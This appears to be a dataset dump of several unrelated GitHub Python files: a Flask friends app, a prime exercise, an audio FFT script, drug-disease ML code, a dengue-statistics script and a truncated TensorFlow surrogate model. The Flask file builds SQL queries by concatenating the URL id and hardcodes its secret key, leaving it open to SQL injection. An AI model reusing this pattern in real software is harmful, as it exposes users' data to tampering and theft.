import Flask, render_template, request, redirect, flash, session\nfrom mysqlconnection import MySQLConnector\nimport re\n\napp = Flask(__name__)\napp.secret_key = 'supersecret'\n\nmysql = MySQLConnector(app, 'friends')\nname_regex = re.compile(r'^[a-zA-Z]+$')\n\n@app.route('/')\ndef index():\n friends = mysql.query_db(\"SELECT * FROM users\")\n return render_template('index.html', friends = friends)\n\n@app.route('/friends', methods=['POST'])\ndef create():\n if validate_name(request.form['fname']) and validate_name(request.form['lname']):\n query = \"INSERT INTO users (first_name, last_name, created_at, updated_at) VALUES (:first_name, :last_name, NOW(), NOW())\"\n data = {\n 'first_name' : request.form['fname'],\n 'last_name' : request.form['lname']\n }\n mysql.query_db(query, data)\n else:\n flash(\"Please enter a valid name (no numbers or symbols)\")\n return redirect('/')\n\n@app.route('/friends//edit')\ndef edit(id):\n friend_info = mysql.query_db(\"SELECT first_name, last_name, id FROM users WHERE id = \" + id)\n return render_template('friend.html', friend_info = friend_info)\n\n@app.route('/friends/', methods=['POST'])\ndef update(id):\n if validate_name(request.form['fname']) and validate_name(request.form['lname']):\n query = \"UPDATE users SET first_name = :first_name, last_name = :last_name, updated_at = NOW() WHERE id =\" + id\n data = {\n 'first_name' : request.form['fname'],\n 'last_name' : request.form['lname']\n }\n mysql.query_db(query, data)\n else:\n friend_info = mysql.query_db(\"SELECT first_name, last_name, id FROM users WHERE id = \" + id)\n flash(\"Please enter a valid name (no numbers or symbols)\")\n return redirect('/')\n\n@app.route('/friends//delete', methods = ['POST'])\ndef destroy(id):\n mysql.query_db(\"DELETE FROM users WHERE id =\" + id)\n return redirect('/')\n\ndef validate_name(name):\n if name_regex.match(name):\n return True\n else:\n return False\n\napp.run(debug=True)\n","repo_name":"leosooter/LeoSooter-1","sub_path":"Week4/FullFriends/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"16184695234","text":"def is_prime(n, primes):\n for i in primes:\n if n % i == 0:\n return False\n \n return True\n\ndef is_even(n):\n return n % 2 == 0\n\ndef next_prime(f, primes):\n print(f\"next prime {f}\\n\")\n if is_even(f):\n next = f + 1\n else:\n next = f + 2\n \n while True:\n if is_prime(next, primes):\n return next\n next += 2\n\ndef prime(number):\n if number == 0:\n raise ValueError(\"there is no zeroth prime\")\n\n primes = [2]\n curr = 2\n while len(primes) != number:\n next = next_prime(curr, primes)\n primes.append(next)\n print(f\"found {len(primes)} primes\")\n curr = next\n \n return primes.pop()\n","repo_name":"jordanabderrachid/exercism-python","sub_path":"nth-prime/nth_prime.py","file_name":"nth_prime.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33575147114","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy.fftpack\r\nimport wave\r\n\r\nimport util\r\nimport filter\r\nimport note\r\nimport harmonics as harm\r\n\r\nnotetable = note.create_note_table()\r\n\r\n#wavfile = wave.open(\"./testfiles/Grand Piano - Fazioli - minor chords - Am highest.wav\")\r\n#wavfile = wave.open(\"./testfiles/Grand Piano - Fazioli - minor chords - Gm highest.wav\")\r\n#wavfile = wave.open(\"./testfiles/440Hz_44100Hz_16bit_05sec.wav\")\r\nwavfile = wave.open(\"./testfiles/low.wav\")\r\n\r\nfs = wavfile.getframerate()\r\nnchannels = wavfile.getnchannels()\r\n\r\nprint(\"Sampling freq={0}, noOfChannels={1}\".format(fs, nchannels))\r\n\r\n# Plot wav file\r\nsignal = wavfile.readframes(-1)\r\nsignal = np.fromstring(signal, 'Int16')\r\n\r\nif nchannels > 1:\r\n signal = util.create_mono_stream_float(signal)\r\n\r\n# Get time from indices\r\n#fs = wavfile.getframerate()\r\n#Time=np.linspace(0, len(mono)/fs, len(mono))\r\n# Plot\r\n#plt.figure(1)\r\n#plt.title('Signal Wave...')\r\n#plt.plot(Time, mono)\r\n# plt.show()\r\n\r\n# Re-sample signal at 11025 Hz (Maxing out at 5512.5 Hz)\r\nsignal = signal[::4]\r\nfs = 11025\r\nsignal = filter.butter_lowpass_filter(signal, 5000, fs, order=5)\r\n\r\n# FFT test signal\r\nN = fs #fs//2\r\nT = 1.0 / fs\r\n#x = np.linspace(0.0, N*T, N)\r\n#print(x)\r\n#y = np.sin(50.0 * 2.0*np.pi*x) + 0.5*np.sin(5000.0 * 2.0*np.pi*x)\r\n# ffts_rounds = len(mono)//N\r\n#for i in range(0, ffts_rounds):\r\n# y = channels[0][i*N:i*N+N]\r\n # Number of samplepoints\r\n # sample spacing\r\nyf = scipy.fftpack.fft(signal[:N])\r\nxf = np.linspace(0.0, 1.0/(2.0*T), N//2)\r\nfig, ax = plt.subplots()\r\nax.plot(xf, 2.0/N * np.abs(yf[0:N//2]))\r\nplt.show()\r\n\r\n# Use the first half of the data and convert to magnitude\r\nX = np.abs(yf[0:len(yf)//2])\r\n#print(type(X))\r\n\r\n# Normalize X\r\nX = X/sum(X)\r\n\r\n# Save the 20 last and reverse\r\nsorted1 = X.argsort()[-100:][::-1]\r\n\r\nharm.init()\r\nharmonics = harm.find_harmonics(sorted1, 3)\r\nprint(harmonics)\r\n\r\n#area = sum(X[sorted1])\r\n#print(\"Area of the 100 first : {}\".format(area))\r\n\r\n#for i in range(0, len(sorted1)):\r\n# print(\"Frequency: {0} Area: {1}\".format(sorted1[i], X[sorted1[i]]))\r\n\r\n#print(sorted1*(fs/N))\r\n","repo_name":"matthall3531/chordmasta","sub_path":"research/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8024981044","text":"from enum import Enum\nfrom types import SimpleNamespace, FunctionType\nfrom typing import Dict, Tuple, List\n\nfrom pandas import concat, DataFrame\n\nfrom data_sources.drug_central import substances_for\nfrom data_sources.drug_connectivity_map import dcm\nfrom data_sources.census import CancerCensus\nfrom utilities_namespace import show_table\nfrom helpers.cache import cache_decorator\nimport metrics\n\n\nclass Mode(Enum):\n regression = 1\n classification = 2\n\n\ncensus = CancerCensus().census\n\n\ncensus_genes = [str(e) for e in census.entrez_geneid]\nencoded_census_genes = [e.encode() for e in census_genes]\n\n\nclass AssociationsPreparation:\n\n def __init__(self, disease_code_to_disease_terms: Dict[str, List[str]], get_disease_expression: FunctionType):\n self.disease_code_to_disease_terms = disease_code_to_disease_terms\n controls_ids = dcm.all_controls(consensus=True).sig_id\n self.all_controls = dcm.from_ids(controls_ids, limit_to_one=True).reindex(encoded_census_genes)\n self.get_disease_expression = get_disease_expression\n\n @cache_decorator\n def get_differential(self, cancer_type, metric, limit_to_census, only_paired):\n\n expression_data = self.get_disease_expression(cancer_type, index='entrez_gene_id')\n differential = expression_data.differential(\n metric=metric,\n limit_to=census_genes if limit_to_census else None,\n only_paired=only_paired\n )\n return differential\n\n def find_substances(self, disease_name: str, contra: bool=False):\n search_terms = self.disease_code_to_disease_terms[disease_name]\n return [\n substance\n for term in search_terms\n for substance in substances_for(term, contra)\n ]\n\n def get_data_for(\n self,\n disease_name, limit_to_census=True, show_tables=False, ranks=False,\n mode=Mode.regression, cell_line_controls=True, disease_controls=True,\n fold_changes=True, only_paired=True\n ) -> Tuple[DataFrame, List]:\n\n assert not (fold_changes and ranks)\n assert mode in {mode.regression, mode.classification}\n\n metric = metrics.fold_change if fold_changes else metrics.signal_to_noise\n\n differential = self.get_differential(disease_name, metric, limit_to_census, only_paired)\n\n if differential is None:\n print(f'Not enough samples for {disease_name}, skipping')\n return None, None\n\n indicated_substances = self.find_substances(disease_name)\n contraindicated_substances = self.find_substances(disease_name, contra=True)\n\n indications = dcm.from_perturbations(indicated_substances, limit_to_one=True).reindex(encoded_census_genes)\n contraindications = dcm.from_perturbations(contraindicated_substances, limit_to_one=True).reindex(encoded_census_genes)\n\n controls = self.all_controls\n\n def fold_change(perturbation):\n control = dcm.get_control(perturbation.name, limit_to_genes=encoded_census_genes)\n assert (control.index == perturbation.index).all()\n return perturbation.divide(control)\n\n if fold_changes:\n indications = indications.apply(fold_change, axis='rows')\n contraindications = contraindications.apply(fold_change, axis='rows')\n controls = controls.apply(fold_change, axis='rows')\n\n common_genes = set(encoded_census_genes)\n common_genes -= set(indications[indications.isnull().any(axis=1)].index)\n common_genes -= set(contraindications[contraindications.isnull().any(axis=1)].index)\n common_genes -= set(differential[differential.isnull()].index)\n\n indications = indications.loc[common_genes]\n contraindications = contraindications.loc[common_genes]\n differential = differential.loc[common_genes]\n controls = controls.loc[common_genes]\n\n if ranks:\n indications = indications.rank(axis='rows')\n contraindications = contraindications.rank(axis='rows')\n differential = differential.rank()\n\n # drug inducing expression same as the disease (so basically causing a disease) is no cure for the disease\n disease_controls = DataFrame(differential, columns=[disease_name]) if disease_controls else DataFrame()\n\n differential.index = differential.index.map(lambda gene: b'disease_' + gene)\n\n input_data = []\n\n if not cell_line_controls:\n controls = controls.drop(controls.columns)\n\n categories = [indications, contraindications, controls, disease_controls]\n\n if show_tables:\n for category in categories:\n show_table(category, n_rows=3)\n\n for category in categories:\n signatures = category.columns\n\n if len(signatures):\n dummy = concat([differential] * len(signatures), axis=1)\n dummy.columns = signatures\n input_for_category = concat([category, dummy])\n input_data.append(input_for_category)\n\n if not input_data:\n return None, None\n\n x = concat(input_data, axis=1)\n\n labels_by_mode = {\n Mode.classification: SimpleNamespace(\n indication='indication',\n contraindication='contraindication',\n control='control'\n ),\n Mode.regression: SimpleNamespace(\n indication=1,\n contraindication=-1,\n control=0\n )\n }\n\n labels = labels_by_mode[mode]\n\n y = (\n [labels.indication] * len(indications.columns) +\n [labels.contraindication] * len(contraindications.columns) +\n [labels.control] * len(controls.columns) +\n [labels.control] * len(disease_controls.columns)\n )\n\n return x, y\n","repo_name":"krassowski/drug-disease-profile-matching","sub_path":"signature_scoring/machine_learning.py","file_name":"machine_learning.py","file_ext":"py","file_size_in_byte":5859,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"73683938986","text":"# Reto 5\n# Eventos de dengue ocurridos en el año 2015\n\n\ntry:\n archivo = open(\"archivo/eventos_2015.txt\")\n contador = 0\n lista_eventos = []\n for linea in archivo:\n if contador > 0:\n linea = linea.replace(\"\\n\", \"\")\n linea_datos = linea.split(\";\")\n linea_datos[2] = int(linea_datos[2])\n lista_eventos.append(linea_datos)\n contador += 1\n\nexcept FileNotFoundError:\n print(\"Archivo no encontrado\")\nelse:\n print(\"Archivo encontrado\")\n\ncantidadHombreHospitalizados = 0\nmujeresBarrioLaCumbre = 0\nregistroMenores = 0\nmesJulio = 0\n\nfor datos in lista_eventos:\n if datos[3] == 'M' and datos[6] == 'Si':\n cantidadHombreHospitalizados += 1\n if datos[3] == 'F' and datos[4] == 'LA CUMBRE':\n mujeresBarrioLaCumbre += 1\n if datos[2] <= 18:\n registroMenores += 1\n sub_linea_fecha = datos[1].split(\"-\")\n anio = sub_linea_fecha[0]\n mes = sub_linea_fecha[1]\n dia = sub_linea_fecha[2]\n if (mes == '07'):\n mesJulio += 1\n\n\ndef porEdadMenorMujeres(registro):\n return [registro[3], registro[2]]\n\n\nprint()\nprint(\"Registro de Mujeres de Menor Edad\")\nprint(\"FECHA ------- BARRIO-------EDAD\")\nlista_eventos.sort(key=porEdadMenorMujeres, reverse=False)\n\nfor i in range(0, 5, 1):\n print(lista_eventos[i][0],lista_eventos[i][1], \" - \", lista_eventos[i][4], \" - \", lista_eventos[i][2])\n\n\ndef porEdadMayor(registro):\n return [registro[2]]\n\n\nlista_eventos.sort(key=porEdadMayor, reverse=True)\nprint()\nprint(\"20 Registros con mayor edad\")\nprint(\"FECHA ------- BARRIO-------EDAD\")\nfor i in range(0, 20, 1):\n print(lista_eventos[i][1], \" - \", lista_eventos[i][4], \" - \", lista_eventos[i][2])\n\nprint()\nprint(\"Cantidad de hombres hospitalizados: \", cantidadHombreHospitalizados)\nprint(\"Cantidad de Mujeres que viven en el Barrio la cumbre: \", mujeresBarrioLaCumbre)\nprint(\"Registros de igual o menor a 18 años de edad: \", registroMenores)\nprint(\"Registros en el mes de Julio: \", mesJulio)\n","repo_name":"lvicenteaa/RetosMisionTic","sub_path":"reto5.py","file_name":"reto5.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70413955309","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport tensorflow.keras.layers\nfrom tensorflow.keras.layers import Dense, Input, Dropout, LeakyReLU, BatchNormalization\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras import backend as K\n\nfrom tensorflow.keras.losses import mse\nfrom tensorflow.keras.models import Sequential\nimport time\nimport resource\nimport gc\n\nfrom sklearn.utils import shuffle\n\nfrom tensorflow.keras.backend import clear_session\nfrom tensorflow.keras import layers\nfrom tensorflow import compat\nfrom tensorflow.python.keras import backend as K\nimport tensorflow as tf\n\n#setings for limiting cores (if required)\n# config = compat.v1.ConfigProto(intra_op_parallelism_threads=4,\n# inter_op_parallelism_threads=4,\n# allow_soft_placement=True)\n#\n# session = compat.v1.Session(config=config)\n# K.set_session(session)\n\n#default losses\ncross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True)\nmse = tf.keras.losses.MeanSquaredError()\naccuracy = tf.keras.metrics.BinaryAccuracy()\n#samping for variational\nclass Sampling(layers.Layer):\n \"\"\"Uses (z_mean, z_log_var) to sample z, the vector encoding a digit.\"\"\"\n\n def call(self, inputs):\n z_mean, z_log_var = inputs\n batch = tf.shape(z_mean)[0]\n dim = tf.shape(z_mean)[1]\n epsilon = tf.keras.backend.random_normal(shape=(batch, dim))\n return z_mean + tf.exp(0.5 * z_log_var) * epsilon\n\n#custom losses\ndef full_models_loss(inputs, reconstruction, loss_weight):\n return loss_weight * mse(inputs, reconstruction)\n\ndef discriminator_loss(real_output, fake_output, loss_weight):\n loss_real = cross_entropy(tf.ones_like(real_output), real_output)\n loss_fake = cross_entropy(tf.zeros_like(fake_output), fake_output)\n return loss_weight * (loss_fake + loss_real)\n\ndef generator_loss(fake_output, loss_weight):\n return loss_weight * cross_entropy(tf.ones_like(fake_output), fake_output)\n\n#surrogate_model class\nclass surrogate_model:\n #initialise with input/output size\n def __init__(self, input_size,output_size):\n self.input_size = input_size\n self.output_size = output_size\n\n #create architecture\n #nlayers = num of layers, real_layer can be 'Adversarial' or 'Variational', real_position is position of real layer,\n #def neurons can be used to determine the number of neurons in each layer (int or list), others are hyperparameters for layers\n def create_architecture(self,nlayers, real_layer = False, real_position = 0, def_neurons = False, beta = 0.001, drop_rate = 0.1,\n loss_weights = [0.95,0.04,0.01],activation_function='elu', drop_out = None, use_bias = True,\n regularizer = None, real_number =False):\n nlayers -= 1\n self.beta = beta\n self.loss_weights = loss_weights\n self.real_layer = real_layer\n self.type = real_layer\n #Input layer\n Input_img = Input(shape=(self.input_size,))\n if def_neurons == False:\n layer = Dense(self.input_size, activation=activation_function, name='layer0',kernel_regularizer=regularizer, use_bias=use_bias)(Input_img)\n else:\n try:\n layer = Dense(def_neurons[0], activation=activation_function, name='laye0',kernel_regularizer=regularizer, use_bias=use_bias)(Input_img)\n except:\n layer = Dense(def_neurons, activation=activation_function, name='layer0',kernel_regularizer=regularizer, use_bias=use_bias)(Input_img)\n i = 0\n while i < nlayers:\n i += 1\n if i == nlayers:\n layer = Dense(self.output_size, activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(layer)\n else:\n if drop_out != None:\n layer = Dropout(drop_out)(layer)\n else:\n None\n if (real_layer != False) and (real_position == i):\n if real_layer == 'Adversarial':\n # real adversarial layers\n front_model = Model(Input_img,layer)\n if real_number == False:\n if def_neurons == False:\n self.nlatent = self.input_size\n Input_img_mid = Input(shape=(self.input_size,))\n layer = Dense(self.input_size, activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n else:\n try:\n self.nlatent = def_neurons[i-1]\n Input_img_mid = Input(shape=(def_neurons[i-1],))\n layer = Dense(def_neurons[i], activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n except:\n self.nlatent = def_neurons\n Input_img_mid = Input(shape=(def_neurons,))\n layer = Dense(def_neurons, activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n else:\n try:\n self.nlatent = def_neurons[i-1]\n except:\n self.nlatent = def_neurons\n Input_img_mid = Input(shape=(self.nlatent,))\n layer = Dense(real_number, activation=activation_function, name='layer' + str(i),\n kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n\n elif real_layer == 'Variational':\n #real variational layers\n if real_number == False:\n if def_neurons == False:\n z_mean = Dense(self.input_size, name='z_mean')(layer)\n z_log_var = Dense(self.input_size, name='z_log_var')(layer)\n z = Sampling()([z_mean, z_log_var])\n else:\n try:\n z_mean = Dense(def_neurons[i], name='z_mean')(layer)\n z_log_var = Dense(def_neurons[i], name='z_log_var')(layer)\n z = Sampling()([z_mean, z_log_var])\n except:\n z_mean = Dense(def_neurons, name='z_mean')(layer)\n z_log_var = Dense(def_neurons, name='z_log_var')(layer)\n z = Sampling()([z_mean, z_log_var])\n else:\n z_mean = Dense(real_number, name='z_mean')(layer)\n z_log_var = Dense(real_number, name='z_log_var')(layer)\n z = Sampling()([z_mean, z_log_var])\n front_model = Model(Input_img, [z_mean, z_log_var, z], name='encoder')\n if real_number == False:\n if def_neurons == False:\n Input_img_mid = Input(shape=(self.input_size,))\n layer = Dense(self.input_size, activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n else:\n try:\n Input_img_mid = Input(shape=(def_neurons[i-1],))\n layer = Dense(def_neurons[i], activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n except:\n Input_img_mid = Input(shape=(def_neurons,))\n layer = Dense(def_neurons, activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n else:\n Input_img_mid = Input(shape=(real_number,))\n layer = Dense(real_number, activation=activation_function, name='layer' + str(i),\n kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n else:\n print('Not an acceptable real layer type')\n else:\n if def_neurons == False:\n layer = Dense(self.input_size, activation = activation_function, name = 'layer'+str(i),kernel_regularizer=regularizer, use_bias=use_bias)(layer)\n else:\n try:\n layer = Dense(def_neurons[i], activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(layer)\n except:\n layer = Dense(def_neurons, activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(layer)\n\n if real_layer == 'Adversarial':\n # constructs front, back, combined and critic models\n self.front_model = front_model\n back_model = Model(Input_img_mid,layer,name='decoder')\n self.back_model = back_model\n full_model = Sequential([self.front_model,self.back_model])\n self.full_model = full_model\n if def_neurons == False:\n self.latent = self.input_size\n Input_img_disc = Input(shape=(self.input_size))\n layer = Dense(self.input_size)(Input_img_disc)\n else:\n try:\n self.latent = def_neurons[real_position]\n Input_img_disc = Input(shape=(def_neurons[real_position]))\n layer = Dense(def_neurons[real_position])(Input_img_disc)\n except:\n self.latent = def_neurons\n Input_img_disc = Input(shape=(def_neurons))\n layer = Dense(def_neurons)(Input_img_disc)\n layer = BatchNormalization()(layer)\n layer = LeakyReLU()(layer)\n if def_neurons == False:\n self.latent = self.input_size\n Input_img_disc = Input(shape=(self.input_size))\n layer = Dense(self.input_size)(Input_img_disc)\n else:\n try:\n self.latent = def_neurons[real_position-1]\n Input_img_disc = Input(shape=(def_neurons[real_position-1]))\n layer = Dense(def_neurons[real_position])(Input_img_disc)\n except:\n self.latent = def_neurons\n Input_img_disc = Input(shape=(def_neurons))\n layer = Dense(def_neurons)(Input_img_disc)\n layer = BatchNormalization()(layer)\n layer = LeakyReLU()(layer)\n layer = Dropout(drop_rate)(layer)\n layer = Dense(1, activation='sigmoid')(layer)\n disc = Model(Input_img_disc,layer)\n self.disc = disc\n Adv_input = Input(shape=(self.input_size))\n adv_front = self.front_model(Adv_input)\n adv_back_output = self.back_model(adv_front)\n disc_output = self.disc(adv_front)\n self.combined = Model(Adv_input, [adv_back_output, disc_output])\n elif real_layer == 'Variational':\n #constructs front and back models\n self.front_model = front_model\n back_model = Model(Input_img_mid, layer)\n self.back_model = back_model\n else:\n self.full_model = Model(Input_img, layer)\n\n #custom training step for adversarial model\n @tf.function\n def train_step_adv(self,batch_x, batch_y=None, training = True):\n with tf.GradientTape() as ae_tape:\n encoder_output = self.front_model(batch_x, training=True)\n decoder_output = self.back_model(encoder_output, training=True)\n # Autoencoder loss\n ae_loss = full_models_loss(batch_y, decoder_output, self.loss_weights[0])\n if training == True:\n ae_grads = ae_tape.gradient(ae_loss,\n self.front_model.trainable_variables + self.back_model.trainable_variables)\n self.ae_optimizer.apply_gradients(\n zip(ae_grads, self.front_model.trainable_variables + self.back_model.trainable_variables))\n\n # Discriminator\n with tf.GradientTape() as dc_tape:\n real_distribution = tf.random.normal([batch_x.shape[0], self.nlatent], mean=0.0, stddev=1.0)\n encoder_output = self.front_model(batch_x, training=True)\n\n dc_real = self.disc(real_distribution, training=True)\n dc_fake = self.disc(encoder_output, training=True)\n\n # Discriminator Loss\n dc_loss = discriminator_loss(dc_real, dc_fake, self.loss_weights[2])\n\n # Discriminator Acc\n dc_acc = accuracy(tf.concat([tf.ones_like(dc_real), tf.zeros_like(dc_fake)], axis=0),\n tf.concat([dc_real, dc_fake], axis=0))\n if training == True:\n dc_grads = dc_tape.gradient(dc_loss, self.disc.trainable_variables)\n self.dc_optimizer.apply_gradients(zip(dc_grads, self.disc.trainable_variables))\n\n # Generator (Encoder)\n with tf.GradientTape() as gen_tape:\n encoder_output = self.front_model(batch_x, training=True)\n dc_fake = self.disc(encoder_output, training=True)\n\n # Generator loss\n gen_loss = generator_loss(dc_fake, self.loss_weights[1])\n if training == True:\n gen_grads = gen_tape.gradient(gen_loss, self.front_model.trainable_variables)\n self.gen_optimizer.apply_gradients(zip(gen_grads, self.front_model.trainable_variables))\n\n return ae_loss, dc_loss, dc_acc, gen_loss\n\n # custom training step for variational model\n @tf.function\n def train_step_var(self, batch_x, batch_y=None, training=True):\n # print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n with tf.GradientTape() as ae_tape:\n z_mean, z_log_var, z = self.front_model(batch_x,training=training)\n reconstruction = self.back_model(z, training=training)\n reconstruction = K.flatten(reconstruction)\n y_flatten = K.flatten(batch_y)\n reconstruction_loss = mse(y_flatten, reconstruction)\n kl_loss = -5e-4 * self.beta*K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)\n total_loss = K.mean(reconstruction_loss + kl_loss)\n if training == True:\n ae_grads = ae_tape.gradient(total_loss,\n self.front_model.trainable_variables + self.back_model.trainable_variables)\n self.ae_optimizer.apply_gradients(\n zip(ae_grads, self.front_model.trainable_variables + self.back_model.trainable_variables))\n\n return reconstruction_loss, kl_loss, total_loss\n # custom training step for normal model\n @tf.function\n def train_step_norm(self, batch_x, batch_y=None, training=True):\n\n with tf.GradientTape() as ae_tape:\n output = self.full_model(batch_x)\n reconstruction = K.flatten(output)\n y_flatten = K.flatten(batch_y)\n reconstruction_loss = mse(y_flatten, reconstruction)\n if training == True:\n ae_grads = ae_tape.gradient(reconstruction_loss,\n self.full_model.trainable_variables)\n self.ae_optimizer.apply_gradients(\n zip(ae_grads, self.full_model.trainable_variables))\n\n return reconstruction_loss\n\n #single epoch of back propogation\n def pred_back_step(self,input_guess,real_output,specify_input=None,start_loss = 0,end_loss = -1, mini_batch = False\n , constraint = False, con_wei = 0, ncon_num=5):\n #input guess is the single set of model coeffecients, real_output is the known solution for multiple experiments,\n #specify input is an optional input that specifies a part of the input, start and end loss determine the part of the\n #output where mse is applied\n #mini batch determines when the loss is updated\n mid_point = np.zeros((1,input_guess.shape[1]-ncon_num))\n mid_point[:,:]=1/2.0\n # mid_point = tf.Variable(mid_point)\n if mini_batch == False:\n with tf.GradientTape() as tape:\n #assign tape to watch the input_guess\n tape.watch(input_guess)\n #iterate across all experiments recieved\n for i in range(real_output.shape[0]):\n #assign the first 5 variables in the input_guess to be the experimental conditions\n if specify_input.any() ==None:\n None\n else:\n for j10 in range(ncon_num):\n input_guess[0,j10].assign(specify_input[i,j10])\n #predict the output solution from the 5 experimental conditions + 27 model coeffecients\n network_output = self.full_model(input_guess, training=False)\n #determine the MSE between the known solution for a given experiment and the one produced above\n if i == 0:\n loss = mse(real_output[i,int(start_loss):int(end_loss)],network_output[0,int(start_loss):int(end_loss)])\n else:\n loss = loss + mse(real_output[i,int(start_loss):int(end_loss)], network_output[0,int(start_loss):int(end_loss)])\n\n #determine the mean loss across all experiments\n loss = loss/real_output.shape[0]\n if constraint == True:\n if specify_input.any()==None:\n con_loss = mse(input_guess[0, :], mid_point[0, :])\n else:\n con_loss = mse(input_guess[0,ncon_num:],mid_point[0,:])\n con_loss = tf.cast(con_loss, tf.float32)\n loss = loss + con_wei*con_loss\n #determine the gradient of the loss applied to the input guess\n gradient = tape.gradient(loss,input_guess)\n #change the input guess based on this gradient\n self.ae_optimizer.apply_gradients(zip([gradient],[input_guess]))\n #if any model coeffecient deviates from range, adjust it back (ignore parameters)\n for i in range(ncon_num,input_guess.shape[1]):\n if input_guess[0, i] > 1:\n input_guess[0, i].assign(0.999)\n elif input_guess[0, i] < 0:\n input_guess[0, i].assign(0.001)\n else:\n None\n #same as above but input guess is modified after each experiment rather than after all experiments\n elif mini_batch == True:\n for i in range(real_output.shape[0]):\n with tf.GradientTape() as tape:\n tape.watch(input_guess)\n if specify_input.any() ==None:\n None\n else:\n for j10 in range(ncon_num):\n input_guess[0, j10].assign(specify_input[i, j10])\n\n network_output = self.full_model(input_guess, training=False)\n loss = mse(real_output[i, int(start_loss):int(end_loss)],\n network_output[0, int(start_loss):int(end_loss)])\n\n gradient = tape.gradient(loss, input_guess)\n self.ae_optimizer.apply_gradients(zip([gradient], [input_guess]))\n return loss\n #predict input\n def predict_input(self,real_output,epoch = 2000,specify_input=None,start_loss =0,end_loss = -1,mini_batch=False,constraint=True,\n con_wei=0, given_coeffs = False):\n #real_output is the known output\n #create optimizer\n self.ae_optimizer = tf.keras.optimizers.Adam()\n #create random input space\n try:\n if given_coeffs==False:\n initial_guess = tf.random.normal([1, self.input_size], mean=0.0, stddev=0.3)\n else:\n initial_guess = tf.convert_to_tensor(given_coeffs)\n except:\n initial_guess = tf.convert_to_tensor(given_coeffs)\n #turn input space into a trainable variables\n initial_guess = tf.Variable(initial_guess)\n loss = []\n #iterate through pred_back_step for the number of epochs, updating loss. Returns the input space\n for i in range(epoch):\n loss.append(self.pred_back_step(initial_guess,real_output,specify_input = specify_input,start_loss=start_loss,\n end_loss=end_loss,mini_batch=mini_batch,constraint=constraint,con_wei=con_wei).numpy())\n self.prediction_loss = loss\n return initial_guess\n\n\n #training model algorithm\n def train_model(self,epochs,training_x,training_y,test_x=None,test_y=None, optimizer = 'Nadam', callbacks = None, loss = 'mean_squared_error', \n batch_size = 200, save_full_model = False, save_location = 'model', shuffle_data=True,\n custom_training=True, early_stopping = False, LRonPlat=False):\n if self.type == 'Variational':\n if custom_training==True:\n base_lr = 0.00025\n if optimizer == 'Adam':\n self.ae_optimizer = tf.keras.optimizers.Adam(lr=base_lr)\n elif optimizer == 'Nadam':\n self.ae_optimizer = tf.keras.optimizers.Nadam(lr=base_lr)\n # tf.config.experimental_run_functions_eagerly(True)\n # Training loop\n n_epochs = epochs\n losses = np.zeros((1, 6))\n max_lr = 0.00025\n n_samples = training_x.shape[0]\n step_size = 2 * np.ceil(n_samples / batch_size)\n global_step = 0\n for epoch in range(n_epochs):\n print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n start = time.time()\n train_epoch_ae_loss_avg = tf.metrics.Mean()\n train_epoch_dc_loss_avg = tf.metrics.Mean()\n train_epoch_dc_acc_avg = tf.metrics.Mean()\n test_epoch_ae_loss_avg = tf.metrics.Mean()\n test_epoch_dc_loss_avg = tf.metrics.Mean()\n test_epoch_dc_acc_avg = tf.metrics.Mean()\n batch_num = int(training_x.shape[0] / batch_size)\n if shuffle_data == True:\n training_x,training_y = shuffle(training_x,training_y)\n for j1 in range(batch_num):\n # -------------------------------------------------------------------------------------------------------------\n train_batch_x = tf.convert_to_tensor(training_x[batch_size * j1:batch_size * (j1 + 1), :])\n train_batch_y = tf.convert_to_tensor(training_y[batch_size * j1:batch_size * (j1 + 1), :])\n global_step = global_step + 1\n cycle = np.floor(1 + global_step / (2 * step_size))\n x_lr = np.abs(global_step / step_size - 2 * cycle + 1)\n clr = base_lr + (max_lr - base_lr) * max(0, 1 - x_lr)\n try:\n self.ae_optimizer.lr = clr\n\n except:\n None\n train_ae_loss, train_dc_loss, train_dc_acc = self.train_step_var(train_batch_x, batch_y=train_batch_y)\n\n train_epoch_ae_loss_avg(train_ae_loss)\n train_epoch_dc_loss_avg(train_dc_loss)\n train_epoch_dc_acc_avg(train_dc_acc)\n if shuffle_data == True:\n test_x,test_y = shuffle(test_x,test_y)\n batch_num = int(test_x.shape[0] / batch_size)\n for j1 in range(batch_num):\n test_batch_x = tf.convert_to_tensor(test_x[batch_size * j1:batch_size * (j1 + 1), :])\n test_batch_y = tf.convert_to_tensor(test_y[batch_size * j1:batch_size * (j1 + 1), :])\n test_ae_loss, test_dc_loss, test_dc_acc = self.train_step_var(test_batch_x, batch_y=test_batch_y,\n training=False)\n 